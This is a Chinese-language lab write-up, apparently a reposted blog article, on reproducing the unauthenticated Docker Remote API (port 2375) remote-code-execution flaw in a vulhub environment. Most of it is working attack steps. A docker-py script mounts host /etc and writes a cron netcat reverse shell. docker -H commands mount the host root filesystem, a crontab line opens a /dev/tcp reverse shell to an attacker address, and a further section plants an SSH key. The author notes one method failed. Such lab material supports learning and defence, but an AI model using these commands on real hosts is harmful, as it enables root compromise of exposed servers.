目錄
一、漏洞介紹
1.1漏洞成因
2.2環(huán)境準(zhǔn)備
二、漏洞檢測
三、漏洞利用
1.腳本利用
2.定時(shí)任務(wù)反彈shell
3. 寫ssh公鑰獲取shell
一、漏洞介紹
1.1漏洞成因
? ? ? ? docker remote API未授權(quán)訪問漏洞,此API主要目的是取代命令執(zhí)行頁面,開放2375監(jiān)聽容器時(shí),會(huì)調(diào)用這個(gè)API。方便docker集群管理和擴(kuò)展
2.2環(huán)境準(zhǔn)備
????????靶機(jī)環(huán)境:192.168.xx.xxx?(ubuntu)
????????攻擊環(huán)境:192.168.xx.xxx?(kali)
????????在靶機(jī)上使用vulhub
復(fù)現(xiàn)漏洞環(huán)境。
????????vulhub官網(wǎng)地址:https://vulhub.org
cd /vulhub/docker/unauthorized-rce
docker-compose build
docker-compose up -d
二、漏洞檢測
直接輸入地址?http://your-ip:2375/version
?;若能訪問,證明存在未授權(quán)訪問漏洞。
三、漏洞利用
1.腳本利用
在kali上安裝docker環(huán)境
apt-get install docker docker-compose
service docker start
?在kali上開啟nc監(jiān)聽本地1111端口,用來接收反彈的Shell
nc -l -p 1111
使用Docker隨意啟動(dòng)一個(gè)容器,并將宿主機(jī)的 /etc 目錄掛載到容器中,便可以任意讀寫文件了??梢詫⒚顚懭?crontab 配置文件,進(jìn)行反彈shell。
import docker
client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
然后執(zhí)行 python 腳本反彈Shell給Kali主機(jī)的1111端口
python docker-hack.py
執(zhí)行完腳本,耐心等待一會(huì)才會(huì)反彈shell到kali主機(jī),大約一分多鐘時(shí)間。
我最后沒彈出來shell-尷尬
2.定時(shí)任務(wù)反彈shell
docker -H tcp://x.x.x.x:2375 images
(1)能看到宿主機(jī)的鏡像,說明漏洞存在
(2)開始利用:
列出當(dāng)前所有鏡像
docker -H 192.168.xxx.xxx:2375 images?
列出當(dāng)前所有容器
docker -H 192.168.xxx.xxx:2375 ps -a?
在宿主機(jī)上啟動(dòng)docker容器:
docker -H tcp://x.x.x.x:2375 run -it -v /:/mnt e66264b98777 /bin/bash (113a43faa138為images ID )
docker -H tcp://x.x.x.x:2375 run -it -v /:/mnt e66264b98777 /bin/sh (113a43faa138為images ID )
這條命令的意思是啟動(dòng)一個(gè)image ID?為e66264b98777的容器,并且將該宿主機(jī)的根目錄掛在到容器的/mnt目錄下
啟動(dòng)之后就會(huì)獲得該容器宿主機(jī)的shell:
?crontab -e 寫入定時(shí)任務(wù)
***** /bin/sh -i >& /dev/tcp/xxx.xxx.xxx.xxx./1234 0>&1
3. 寫ssh公鑰獲取shell
在攻擊者得v屁s上生成一對公私鑰
>>ssh-keygen -t rsa
>>輸入密鑰名
>>輸入密碼
查看并復(fù)制服務(wù)器公鑰
進(jìn)入到victim掛在的目錄下(/mnt/root)
進(jìn)入.ssh目錄,查看是否有公鑰存在(如果有則將之前的公鑰進(jìn)行重定向覆蓋)文章來源:http://www.zghlxwxcb.cn/news/detail-493097.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-493097.html
到了這里,關(guān)于漏洞復(fù)現(xiàn)-docker-unauthorized-rce的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!